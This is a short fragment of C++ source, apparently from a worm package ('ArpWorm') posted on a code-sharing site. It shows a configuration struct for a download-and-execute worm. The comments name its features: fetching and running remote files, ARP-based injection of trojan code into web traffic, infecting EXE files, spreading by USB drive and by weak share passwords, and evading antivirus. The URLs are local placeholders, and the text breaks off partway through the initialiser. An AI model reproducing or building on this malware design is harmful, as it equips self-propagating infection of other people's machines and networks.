www.pudn.com > ArpWorm.rar > WebDownLoaderDlg.cpp


// WebDownLoaderDlg.cpp : implementation file 
// 
 
#include "stdafx.h" 
#include "WebDownLoader.h" 
#include "WebDownLoaderDlg.h" 
 
#ifdef _DEBUG 
#define new DEBUG_NEW 
#undef THIS_FILE 
static char THIS_FILE[] = __FILE__; 
#endif 
struct MODIFY_DATA  
{ 
	char DownFile[100];//下载文件列表 
	char DownRunURL[100]; //下载pcexec的 
	char DownRunFileURL[100]; //下载Server 
	char ArpInject[256];  //Arp感染挂马代码 
	char DownRunArpFile[100]; //下载Arp URL 
	char DownRunBindFile[50]; //文件捆绑下载 URL 
	bool IsWorm;//是否感染EXE启动 
	bool IsUpan;//是否u盘传播 
	bool IsShare;//是否弱口令传播 
	bool IsAnti;//是否反查杀 
	bool IsARP; //是否ARP感染 
	int WaitTime;//巡查时间(分钟) 
}modify_data =  
{ 
	"http://127.0.0.1/down.list", 
	"http://127.0.0.1/", 
    "http://127.0.0.1/", 
	"